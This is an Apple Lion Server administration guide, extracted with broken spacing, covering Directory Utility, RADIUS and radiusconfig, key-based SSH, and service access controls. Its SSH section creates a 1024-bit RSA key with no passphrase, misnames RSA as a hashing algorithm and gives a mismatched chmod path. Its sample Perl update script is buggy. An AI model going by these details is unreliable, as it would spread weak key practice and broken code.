You can us e Directory Utility to enable or disable access to directory services that use LDAPv2 and LDAPv3. A single Directory Utility plug-in named LDAPv3 provides access to LDAP2 and LDAPv3. The directory s ervices provided by a Mac server use LDAPv3, as do many other servers . LDAPv3 is an open standard common in mixed networks of Macintosh, UNIX, and Windows sys tems. Some s ervers us e the older version, LDAPv2, to provide directory service. If you disable LDAP directory services and LDAP directories are part of a custom search policy, they are listed in red in the Authentication or Contacts pane of Search Policy in Directory Utility.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. Next to LDAPv3, select or des elect the Enable checkbox and click OK.
Directory Utility
Search policies
Advanced search policy settings

Each Mac computer has a search policy, also commonly referred to as a search path , that specifies which directory domains Open Directory can access, such as the computers local directory domain and a shared directory. The s earch policy also specifies the order in which Open Directory access es directory domains. Open Directory searches each directory domain and stops s earching when it finds a match. For example, Open Directory stops s earching for a user record when it finds a record whose user name matches the name its looking for. Directory Utility defines the following s earch policies: Authentication: Mac OS X uses the authentication search policy to locate and retrieve user authentication information and other administrative data from directory domains. Contacts : Mac OS X uses the contacts s earch policy to locate and retrieve name, address, and other contact information from directory domains . The Addres s Book application on your Mac computer uses this contact information. Other applications can also be programmed to use it. Each search policy consists of a list of directory domains. The order of directory domains in the lis t defines the s earch policy. Starting at the top of the list, Mac OS X searches each lis ted directory domain until it finds the information it needs or reaches the end of the lis t without finding the information. The authentication and contacts search policies can have one of the following s ettings: Automatic: Starts with the local directory domain and includes LDAP directory domains that the computer is connected to. Local directory: Includes only the local directory domain. Custom path: Starts with the local directory domain and includes your choice of LDAP directories, an Active Directory domain, shared directory domains, BSD configuration files, and an NIS domain.
The /BSD/local folder is always included in the search path, and is always grayed out.
Directory Utility
Search policies
Define search policies

You can define search policies for the directory servers you are connected to. You can define automatic, custom, and local directory search policies. Define automatic search policies Using Directory Utility, you can configure a Mac computers authentication and contacts s earch policies to be defined automatically. An automatically defined search policy includes the local directory domain. It can also include an LDAP directory server specified by the DHCP service. This is the default configuration for the authentication and contacts search policies. Note: Some applications, s uch as Mail and Addres s Book, can access LDAP directories directly, without using Open Directory. To set up one of thes e applications to access LDAP directories directly, open the application and set the correct preference. After changing the s earch policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that us es the authentication search policy are uns uccess ful until changes to it take effect. 1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Search Policy and choose a search policy: Authentication: Shows the s earch policy used for authentication and mos t other administrative data. Contacts: Shows the search policy used for contact information in applications such as Address Book. 7. From the Search pop-up menu, choos e Automatic, then click Apply. 8. In Sys tem Preferences, make s ure the computers Network preferences are configured to us e DHCP or DHCP with a manual IP addres s. Define custom search policies Using Directory Utility, you can configure a Mac computers authentication and contacts s earch policies to us e a cus tom list of directory domains . A cus tom list s tarts with the computers local directory domain and can include Open Directory (and other LDAP directory domains ), an Active Directory domain, s hared directory domains, BSD configuration files , and an NIS domain. If a directory domain s pecified on a computers custom search policy is not available, a delay occurs when the computer starts up. After changing the s earch policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that us es the authentication search policy are uns uccess ful until changes to it take effect. 1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility.
5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Search Policy and choose a search policy. Authentication: Shows the s earch policy used for authentication and mos t other administrative data. Contacts: Shows the search policy used for contact information in applications such as Address Book. 7. From the Search pop-up menu, choos e Custom path. 8. Add directory domains as needed by clicking Add, selecting directories, and clicking Add again. 9. Change the order of the listed directory domains as needed by dragging them up or down the lis t. 10. Remove lis ted directory domains that you dont want in the s earch policy by selecting them and clicking the Delete button (). 11. Confirm the removal by clicking OK, then click Apply. Define local directory search policies Using Directory Utility, you can configure a Mac computers authentication and contacts s earch policies to us e only the computers local directory. A search policy that uses only the local directory limits the access a computer has to authentication information and other administrative data. If you res trict a computers authentication search policy to use only the local directory, only users with local accounts can log in. After changing the s earch policy in the Authentication pane or the Contacts pane of Directory Utility, wait 10 or 15 seconds for the change to take effect. Attempts to log in using an account from a directory domain that us es the authentication search policy are uns uccess ful until changes to it take effect. 1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Search Policy and choose a search policy: Authentication: Shows the s earch policy used for authentication and mos t other administrative data. Contacts: Shows the search policy used for contact information in applications such as Address Book. 7. From the Search pop-up menu, choos e Local directory, then click Apply.
Directory Utility
Records and attributes
Add or delete records

You can us e the Directory Editor in Directory Utility to add or delete records . WARNING: Deleting records can cause the server to behave erratically or stop working. Dont delete records unles s you know theyre not needed for proper s erver functioning. WARNING: After using the Directory Editor to delete user or computer records, use command-line tools to delete the corresponding Kerberos identity and Pass word Server slot. If you leave an orphaned Kerberos identity or Password Server slot, it can conflict with a user or computer record created later.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit.
4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Directory Editor. 7. From the Viewing pop-up menu, choose the record type to modify. 8. From the in-node pop-up menu, choose the directory domain or local directory to modify, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory that you chose. 9. To add a record, click the Add button (+) (below the list of records) and enter a name for the record in the value pane. Depending on the record you add, you might need to make changes to the attribute values of the record. 10. To delete a record, s elect the record to delete, then click the Delete (-) button (below the list of records ). You cannot revert the deleting of a record. If you are sure this is the record you want to delete, click Delete. 11. Click Save.
Directory Utility
Add or delete record attributes

You can us e the Directory Editor in Directory Utility to add or delete record attributes. WARNING: Deleting record attributes can cause the server to behave erratically or s top working. Dont delete record attributes unles s you know theyre not needed for proper server functioning.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Directory Editor. 7. From the Viewing pop-up menu, choose the record type to edit. 8. From the in-node pop-up menu, choose the directory domain or local directory to edit, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory that you chose. 9. From the records list, select the record to edit. You can also s earch the record type you've selected by using the search field above the record list. 10. Add an attribute to a record: a. Click the Add button (+) (below the list of attributes), choos e an attribute from the New attributes of type pop-up menu, and click OK. b. Enter a value for the new attribute. If you choose Native from the New attribute of type pop-up menu, enter the name of a native record in the box that appears below the pop-up menu, then click OK. 11. To delete a record attribute, select the record attribute to delete, then click the Delete button (-) (below the list of records). 12. Click Save.
Directory Utility
View or edit directory data

You can view or edit raw directory data by using the Directory Editor. WARNING: Changing raw data in a directory can have unexpected and undesirable consequences. You could inadvertently incapacitate users or computers , or you could unintentionally authorize users to access more resources.
1. Open Sys tem Preferences on your computer and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Edit. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Directory Editor. 7. From the Viewing pop-up menu, choose the record type to view or edit. 8. From the in-node pop-up menu, choose the directory domain or local directory to view or edit, and authenticate as an administrator of the domain or local directory. To authenticate, click the Lock button next to the directory you chose. 9. From the records list, select the record to view or edit. You can also s earch the record type you chose by using the search field above the record list. 10. From the attributes list (next to the records list), select the attribute name to view or edit. The value of the attribute you select appears in the value pane (below the attribute list). You can modify the attribute value in the value pane. Depending on the attribute you select, you can change how the value appears in the value pane by clicking Image, Text, or Data. Some attribute values are grayed out and cannot be modified. 11. To s ave your changes to the record, click Save.
Security
RADIUS
About RADIUS
Wireless networking gives companies greater network flexibility, seamlessly connecting laptop users to the network and giving them the freedom to move within the company while staying connected to the network. You use RADIUS to authorize Open Directory users and groups s o they can access AirPort Base Stations on a network. By configuring RADIUS and Open Directory you can control who has access to your wireless network. RADIUS works with Open Directory and Pass word Server to grant authorized us ers access to the network through an AirPort Base Station. When a user attempts to access an AirPort Base Station, AirPort communicates with the RADIUS s erver using Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their user credentials are valid and they are authorized to use the AirPort Bas e Station. If a user is not authorized, he or she cannot access the network through the AirPort Base Station.
Security
RADIUS
Set Up RADIUS
RADIUS setup overview

The following steps outline the tas ks to configure and set up RADIUS service. Turn RADIUS On
Before you can configure the service, turn RADIUS on. see Enable RADIUS. Add AirPort Base Stations to a RADIUS server Decide which AirPort Bas e Stations to add to the RADIUS server. See Add AirPort Base Stations to a RADIUS server. Remotely configure an AirPort Base Station Use Server Admin to configure AirPort Base Stations . See Remotely configure AirPort Base Stations . Configure RADIUS to use certificates Use Server Admin to configure RADIUS to use certificates to trust Base Stations . See Configure RADIUS to use certificates. Start RADIUS To start RADIUS, see Start or s top RADIUS.
Security
RADIUS
Set Up RADIUS
Enable RADIUS
Before you can configure RADIUS settings, turn on RADIUS service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings, then click Services. 3. Select the RADIUS checkbox. 4. Click Save.
Security
RADIUS
Set Up RADIUS
Use the configuration assistant to configure RADIUS

You can us e the RADIUS configuration as sistant to configure RADIUS. The configuration assistant guides you through the RADIUS configuration process and lets you s tart RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Overview. 5. Click Configure RADIUS Service. 6. In the RADIUS Server Certificate pane, s elect one of the following: If you select Choose an existing certificate, choos e the certificate from the pop-up menu and click Continue. If you want to create a self-s igned certificate, us e Certificate Ass is tant. For more information, see Server Admin Help. 7. From the Available Base Stations list, select the Base Station you want and click Add. 8. Enter the pas sword of the Base Station in the Base Station Password field, then click Add. To remove a Bas e Station from the Selected Base Stations lis t, select it and click Remove. 9. Click Continue. 10. In the RADIUS Allow Users pane, you can restrict user access : If you select Allow all users , all users access to the Base Stations you select. If you select Restrict to members of group, only users of a group can acces s the Base Stations you select. 11. Click Continue.
12. In the RADIUS setting confirmation pane, verify your s ettings . You can also print or s ave you RADIUS configuration settings. 13. Click Confirm.
Security
RADIUS
Set Up RADIUS
Use radiusconfig to configure RADIUS

You can us e radiusconfig to configure RADIUS.
To view RADIUS settings: $ sudo radiusconfig -appleversion -getconfig -getconfigxml -nascount -naslist -naslistxml -ver - To configure RADIUS parameters: $ sudo radiusconfig -setconfig key value [key value E]
Parameter Description The name of the key to configure in the radiusd.conf or eap.conf files. The value of the key.
Key value
For information about RADIUS server settings, see RADIUS command-line settings. For information about radiusconfig, see its man page.
Security
RADIUS
Set Up RADIUS
Add AirPort Base Stations to a RADIUS server

You use the Bas e Stations pane of RADIUS in Server Admin to add AirPort Base Stations that will use RADIUS s ervice. You can add up to 64 Base Stations to RADIUS.
1. On the management computer, open Server Admin. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. In the expanded Servers list, click RADIUS. 4. Click Bas e Stations. 5. Below the AirPort Base Stations lis t, click the Add button (+) . 6. Enter the following AirPort Base Station information: Name: Specify the name of the AirPort Base Station. Type: Specify the model of the AirPort Base Station. IP Addres s: Specify the IP address of the AirPort Base Station. Shared Secret and Verify: Specify a s hared secret. The shared s ecret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes . It is a token that key management systems use to trust each other. You mus t enter the shared secret on the server as well as a client. 7. Click Add.
Security
RADIUS
Set Up RADIUS
Add Bonjour-enabled AirPort Base Stations to a RADIUS server

If your network has AirPort Base Stations that announce themselves using Bonjour, use the Bas e Stations pane of RADIUS in Server Admin to add them to your RADIUS server. You can add up to 64 Base Stations to RADIUS.
1. On the management computer, open Server Admin. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. In the expanded Servers list, click RADIUS. 4. Click Bas e Stations. 5. Below the AirPort Base Stations lis t, click Browse. A lis t of AirPort Bas e Stations found through Bonjour appears. It shows all AirPort Bas e Stations on the server's local subnet and all Wide-Area Bonjour domains known to the s erver. This includes s earch domains lis ted in Network Preferences that have AirPort Base Stations and AirPort Base Stations you added to a MobileMe account as a Back to My Mac (BTMM) enabled server. 6. From the list of AirPort Base Stations , choos e an AirPort Bas e Station to add to your RADIUS server. 7. In the Base station pas sword field, enter the pass word for the AirPort Base Station. 8. Click Add. When the base s tation is added it is configured to us e WPA2 Enterprise for client authentication through TTLS. It also sets a random s hared secret for communication between the Base Station and RADIUS on the server. The shared s ecret is not a password for authentication, nor does it generate encryption keys to establis h secure tunnels between nodes. It is a token that key management systems use to trus t each other.
Security
RADIUS
Set Up RADIUS
Remotely configure AirPort Base Stations

You can remotely configure AirPort Base Stations to use a RADIUS s erver in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Stations list, highlight the AirPort Base Station and then click Edit. If prompted, enter the AirPort administrator password. 6. Click OK.
Security
RADIUS
Set Up RADIUS
Configure RADIUS to use certificates

You can us e Server Admin to configure RADIUS to use custom certificates . Using a certificate increas es the security and manageability of AirPort Base Stations.
The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings 5. From the RADIUS Certificate pop-up menu, choose a certificate. If you dont have a certificate and want to create one, click Manage Certificates. For more information about creating certificates, s ee Server Admin Help. 6. Click Save.
Security
RADIUS
Set Up RADIUS
Use radiusconfig to configure RADIUS certificates

You can us e radiusconfig to import certificates for RADIUS.
To configure RADIUS certificates: $ sudo radiusconfig -installcerts private-key certificate [trusted-ca-list [yes | no [common-name
Parameter
Description T he file path to the clients private key to use in the certificate T he file path to the certificate T he file path to the trusted CA list A request to check a certificate revocation list A request to not check a certificate revocation list T he common name
private-key certificate trusted-ca-list yes no common-name
This command changes eap.conf to contain an active TLS section and configures the certificates. This command also replaces the random file and creates the dh file if absent. For information about radiusconfig, s ee its man page.
Security
RADIUS
Set Up RADIUS
Archive RADIUS service logs

RADIUS service creates entries in the sys tem log for error and alert mes sages. You can archive these log entries.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings. 5. Select the Archive radiusd log for the past __ days checkbox and enter the number of days to archive. 6. Click Save.
Security
RADIUS
Set Up RADIUS
Use radiusconfig to archive service logs

You can us e radiusconfig to archive RADUIS service logs.
To configure the rotation of RADIUS service logs: $ sudo radiusconfig -rotatelog [-n file-count] base-file To configure the automatic rotation of RADIUS service logs: $ sudo radiusconfig -autorotatelog [on | off] [-n file-count]
Parameter Description Specifies the number of log files to preserve. Specifies the name of the log file. Enables automatic log rotation. Disables automatic log rotation.
file-count base-file on off
Security
RADIUS
Set Up RADIUS
Start or stop RADIUS

You use Server Admin to start or stop RADIUS. When you stop RADIUS, make s ure no users are connected to AirPort Base Stations your RADIUS s erver manages.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Below the Servers list, click Start RADIUS or Stop RADIUS. The service can take a few seconds to s tart or s top.
Security
RADIUS
Set Up RADIUS
Use radiusconfig to start or stop RADUIS

You can us e radiusconfig to s top or start RADIUS.
To s tart the RADIUS server: $ sudo radiusconfig -start To s top the RADIUS server: $ sudo radiusconfig -stop
Security
RADIUS
Set Up RADIUS
RADIUS command-line settings

To change settings for RADIUS, use the following parameters with the radiusconfig tool.
Command Option Description Displays the version of the tool, including the build version. Displays configuration data stored in the radiusd.conf and eap.conf files in an abbreviated, user-friendly format.
-appleversion -getconfig
-getconfigxml
Displays configuration data stored in the radiusd.conf and eap.conf files in xml plist format.
-nascount -naslist -naslistxml -ver -help -q
Displays the number of RADIUS clients. Displays the list of RADIUS clients formatted for the clients.conf file. Displays the list of RADIUS clients in xml plist format. Displays a specific build version. Displays usage information. Suppresses prompts.
Security
RADIUS
Set Up RADIUS
Enable or diable transport level security (TLS)

You can enable or dis able Trans port Level Security (TLS) by modifying the TLS section of the eap.conf file.
To enable TLS: $ sudo radiusconfig -enable-tls To dis able TLS: $ sudo radiusconfig -disable-tls
Security
RADIUS
Manage RADIUS
Check RADIUS Status

You can us e Server Admin to check the status of RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Overview to s ee whether the service is running, the number of client base stations , and when it was s tarted.
Security
RADIUS
Manage RADIUS
View RADIUS logs

RADIUS creates entries in the system log for error and alert messages. You can filter the log to narrow the number of viewable log
entries and make it eas ier to find an entry.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Logs. 5. Choose a log to view (radiusconfig or radiusd).
Security
RADIUS
Manage RADIUS
Edit RADIUS access

You can restrict acces s to RADIUS by creating a group of us ers and adding them to the s ervice acces s control list (SACL) of RADIUS.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Settings, then click Edit Allowed Users . 5. Select For selected services below, then s elect RADIUS. 6. Click Services. 7. Select Allow only us ers and groups below. 8. Click the Add button (+). 9. From the Users & Groups window, drag users or groups to the Allow only users and groups below list. If you dont see a recently created user, click the Refresh button (below the Servers lis t). If you want to remove us ers from the Allow only users and groups below lis t, select the us ers or us er groups and click the Delete button (). Only users in the list can us e RADIUS service.
Security
RADIUS
Manage RADIUS
Delete AirPort Base Stations

You can us e Server Admin to delete AirPort Base Stations from the RADIUS server. When you delete AirPort Base Stations, make s ure the s tations are dis connected from the network. Otherwis e, unauthorized users might access your network.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight a Bas e Station and click Remove. 6. Verify you want to remove the Base Station by clicking Remove again.
Security
RADIUS
Manage RADIUS
Edit an AirPort Base Station record

You can us e Server Admin to edit an AirPort Base Station record on your RADIUS server.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight the Bas e Station to modify and click the Edit button. 6. Modify the Base Station information and click Save.
Security
RADIUS
Manage RADIUS
Save an AirPort Base Station Internet connect file

You can us e Server Admin to s ave an AirPort Bas e Station internet connect file.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select RADIUS. 4. Click Bas e Stations. 5. In the AirPort Base Station list, highlight the bas e station. 6. Click Save Internet Connect File. 7. In the Save As field, enter the name. 8. From the Where pop-up menu, choose the location to save the file. 9. In the Wireless Network Name (SSID) field, enter the wireless network name. 10. Click Save.
Security
RADIUS
Manage RADIUS
Use radiusconfig to manage RADIUS clients

Use the radius config tool to add, import, remove, and configure RADIUS clients.
To add RADIUS clients: $ sudo radiusconfig -addclient nas-name shortname [type] To import RADIUS clients: $ sudo radiusconfig -importclients xml-plist-file To remove RADIUS clients: $ sudo radiusconfig -removeclient nas-name [nas-name ...] To assign an access control group to a client of the RADIUS s ervice:
$ sudo radiusconfig -setgroup nas-namegroup-name
Parameter
Description The name of the client The shortname of the client (Optional) T he type of the client The name of the file, including the path, to import clients from The name of the access control group
nas-name shortname type xml-plist-file group-name
Security
Key-Based SSH login

SSH is a network protocol that establishes a secure channel between your computer and a remote computer. It uses public-key cryptography to authenticate the remote computer. It also provides traffic encryption and data integrity exchanged between computers . Key-based authentication is helpful for s uch tas ks as automating file transfers and backups and for creating failover scripts becaus e it allows computers to communicate without a user needing to enter a pass word. Important: Key-based authentication has risks. If the private key you generate becomes compromis ed, unauthorized users can access your computers . You must determine whether the advantages of key-based authentication are worth the risks. SSH is frequently used to log in to a remote machine to execute commands, but you can also use it to create a s ecure data tunnel, forwarding through an arbitrary TCP port. You can also use SSH to transfer files using SFTP and SCP. By default, an SSH server uses the standard TCP port 22. Lion Server us es OpenSSH as the basis for its SSH tools. Notably, portable home directory synchronization and Open Directory replication are provided via SSH.
Security
Generate a key pair for SSH authentication

This is the proces s of s etting up key-based SSH login authentication on Lion Server. To set up key-based SSH, you must generate the keys the two computers will use to establish and validate the identity of each other. This doesnt authorize all users of the computer to have SSH access . Keys must be generated for each user account. To do this, you must run the following commands in Terminal. The process must be repeated for each user that needs to open key-based SSH ses sions . Important: Key-based authentication has risks. If the private key you generate becomes compromis ed, unauthorized users can access your computers . You must determine whether the advantages of key-based authentication are worth the risks.
1. Verify that an .s sh folder exists in your home folder by entering the command: ls -ld ~/.ssh If .ssh is listed in the output, move to step 2. If .ssh is not listed in the output, run mkdir -m 700 ~/.ssh and continue to step 2. 2. Change directories in the shell to the hidden .ssh directory by entering the following command: cd ~/.ssh 3. Generate the public and private keys by entering the following command: ssh-keygen -b 1024 -t rsa -f id_rsa -P '' The -b flag sets the length of the keys to 1,024-bits, -t indicates to use the RSA hashing algorithm, -f sets the file name as
id_rsa, and -P followed by two single-quote marks sets the private key pas sword to be null. The null private key password allows for automated SSH connections. Keys are equivilant to pas swords , so keep them private and protected. 4. Copy the public key into the authorized key file by entering the following command: cat id_rsa.pub >> authorized_keys2 5. Set the permissions on the private key s o the file can only be changed by the owner: chmod go-rwx ~/.ssh/.id_rsa 6. Copy the public key and the authorized key lists to the specified users home folder on the remote computer by entering the following command: scp authorized_keys2 username@remotemachine:~/.ssh/ To establish two-way communication between servers , repeat this process on the second computer.
Security
Key-Based SSH with scripting sample

A cluster of s ervers is an ideal environment for using key-based SSH. The following Perl s cript is a trivial scripting example that should not be implemented, but it demonstrates connecting over an SSH tunnel to servers defined in the variable serverList, running softwareupdate, installing available updates, and restarting the computer if neces sary. The s cript as sumes that key-based SSH was s et up for an admin user on all servers to be updated. #!/usr/bin/perl # \@ is the escape sequence for the "@" symbol. my @serverList = ('admin\@exampleserver1.example.com', 'admin\@exampleserver2.example.com'); foreach $server (@serverList) { open SBUFF, "ssh $server -x -o batchmode=yes 'softwareupdate -i -a' |"; while(<SBUFF>) { my $flag = 0; chop($_); #check for restart text in $_ my $match = "Please restart immediately"; $count = @{[$_ =~ /$match/g]}; if($count > 0) { $flag = 1; } } close SBUFF; if($flag == 1) { "ssh $server -x -o batchmode=yes shutdown -r now" } }
Security
Administrator permissions
About administration level privileges

Lion Server can use another level of access control for added s ecurity. Administrators can be limited to specific services they can configure. These limitations are enacted on a s erver-by-server basis . This method can be used by an administrator with no restrictions to as sign administrative duties to other admin group users. This results in a tiered administration model, where some administrators have more privileges than others for their assigned services. This results in a kind of access control for individual s erver features and s ervices .
You can determine which s ervices other admin group users can modify. To do this, the adminis trator making the determination must have full, unmodified access .
Security
Using a non-Mac computer for administration

You can us e a non-Mac computer that offers SSH support, such as a UNIX workstation, to administer Lion Server using commandline tools . You can also use any computer that can run a VNC viewer to administer Lion Server. Administering the server via VNC is the same as us ing the server's keyboard, mouse, and monitor locally. You use all the same utilities that Lion uses, but virtually over VNC. You enable a VNC s erver on Lion Server by enabling Screen Sharing in the Sharing pane of Sys tem Preferences.
Use this command line tool serveradmin ssh asr bootpd calendarserver_manage_principals calendarserver_purge_principals defaults diskutil dscacheutil To Configure and monitor services and administrator access Connect to a server using a UNIX command shell. Perform mass disk imaging tasks. Control DHCP service parameters. Add locations and resources to your iCal server. Remove locations and resources to your iCal server. Read and write system or application preferences. Modify, verify, and repair local disks. Gather information, statistics and initiate queries to the Directory Service cache. dscl dsconfigad dseditgroup freshclam hdiutil installer kdcsetup kickstart launchctl networksetup osascript pwpolicy radiusconfig sa-learn security slapconfig systemsetup Configure and alter Directory Services. Configure and modify Active Directory services. Manipulate group directory records. Update the mail service anti-virus database. Manipulate disk images. Install software packages. Configure an Apple Open Directory KDC. Modify Remote Desktop settings and access. Control
launchd.
Configure network settings in System Preferences. Run AppleScripts from the command line. Get and set password policy. Configure the RADIUS services via
radiusd.
T rain SpamAssassin's Baysian filter. Manipulate keychains and the Security framework. Configure
slapd and related daemons.
Configure certain machine settings in System Preferences.
Many additional standard UNIX tools are available like: chmod, mkdir, chown, sudo, tar, pax, rsync, cp, scp, ditto, gzip, tail, syslog,
exit, s u, s rm, les s, cat, passwd, shutdown.
Security
Define tiered administrative permissions

You can decide if a us er or group can monitor or administer a s erver or service without giving them the full power of a UNIX administrative user. Assigning effective permis sions to users creates a tiered adminis tration, where some but not all administrative duties can be carried out by designated individuals.
1. Open Server Admin. 2. Select a s erver, click the Settings button in the toolbar, and then click the Access tab. 3. Click the Administrators tab. 4. Select whether to define adminis trative permissions for all s ervices on the server or for select services. 5. If you define permissions by service, s elect the related checkbox for each s ervice you want to turn on. If you define permissions by service, be sure to assign adminis trators to all the active s ervices on the server. 6. Click the Add button (+) to add a us er or group from the users and group window. To remove administrative permis sions, select a us er or group and click the Remove (-) button. 7. For each user or group, select the permissions level next to the user or group name. You can choos e Monitor or Administer. The capabilities of Server Admin to administer the s erver are limited by this s etting when the server is added to the Server list.
Security
Add and remove services in the server view

Before you can set up s ervices using Server Admin, you must add the service to the s erver view. You can add items to Server Admin's service list using the command line. For example, by default, no services can be s een for your server. As you select services to administer, configuration panes become access ible in a lis t underneath your computer name. When you select s ervices from the list, thos e services appear underneath the server hos tname in the s erver list.
sudo serveradmin settings info:serviceConfig:services:com.apple.ServerAdmin.<service name>:configured = yes
Security
Tiered administration permissions

You can grant individuals and groups specific adminis trative permissions without adding them to the UNIX admin group. In other words, you can make them administrator users. There are two tiers of permis sions : Administer: This level of permission is analogous to being in the UNIX admin group. You can change any setting on the server for the designated s erver and service only. Monitor: This level of permis sion allows you to view Overview panes, Log panes, and other information panes in Server Admin, as well as general server s tatus data in s erver status lis ts . You do not have access to any saved service settings. Any user or group can be given these permissions for all services or for selected services. The permissions are s tored on a perserver basis. The only users that can change the tiered administration acces s list are users that are in the UNIX admin group. Server Admin updates to reflect what operations are pos sible for a user's permissions . For example, some services are hidden or
the Settings pane is dimmed when you can only monitor that service. Because the feature is enforced on the server side, the permissions also impact the usage of s erveradmin, dscl, dsimport, and pwpolicy command-line tools because these tools are limited to the permis sions configured for the adminis trator in us e.
Security
Serv ice access
Service level security

You use a Service Access Control List (SACL) to enforce who can us e a service. It is not a means of authentication. It is a list of those who have access rights to use a service. SACLs allow you to add a layer of acces s control on top of s tandard and ACL permissions. Only us ers and groups in an SACL can access its corresponding s ervice. For example, to prevent users from acces sing AFP share points on a server, including home folders , remove the users from the AFP services SACL. Server Admin in Lion Server allows you to configure SACLs. Open Directory authenticates us er accounts and SACLs authorize use of s ervices . If Open Directory authenticates you, the SACL for login window determines whether you can log in, the SACL for AFP service determines whether you can connect for Apple file service, and s o on.
Security
Serv ice access
Control access to services

You can us e Server Admin to configure which users and groups can use s ervices hosted by a s erver. You s et up access to services to users and groups us ing SACLs. You can s et up the same acces s to all services, or you can select a service and customize its access s ettings. Access controls are s imple. Choose between allowing all users and groups to use s ervices or allowing selected users and groups to us e services. You can separately s pecify access controls for individual services, or you can define one set of controls that applies for services hosted by the s erver.
You can also control us er access to several services us ing the Server app. For example, only the Server app can control user access to Podcas t and Time Machine services. For information, see Control a users access to services.
1. Select a s erver in the Servers list. 2. Click Settings, then click Access. 3. Click Services. 4. Choose a service and then choose whether to allow everyone access to it or whether to allow specified users to access the service.
5. If you have chosen to specify users , add the users and groups as needed.
RELATED INFORMATION
Security
Serv ice access

Use the Server app to control users access to services. You can restrict users access to services listed in the Server app except Web and Wiki services. Web and Wiki s ervices have more cus tomizable acces s control. For webs ites , you can limit access on a per-s ite level. For example, if your server is hosting two webs ites , www.example1.com and www.example2.com, you can give users acces s to www.example1.com but not to www.example2.com. Wikis have their own acces s controls, so you can restrict whos allowed to create wikis . When you create a wiki, you can designate others as adminis trators. Wiki administrators can choose who has access to the wiki and whether they can read and write or just read wiki content.
1. In the Server app, click Us ers. 2. Control-click the user and choose Edit Acces s to Services . 3. In the dialog that appears, s elect the checkboxes for services you want the user to access, then click OK.
RELATED TOPICS
Publish a website Choose group s ervices
Security
File permissions
About permissions
Permissions in the Mac OS X Lion environment

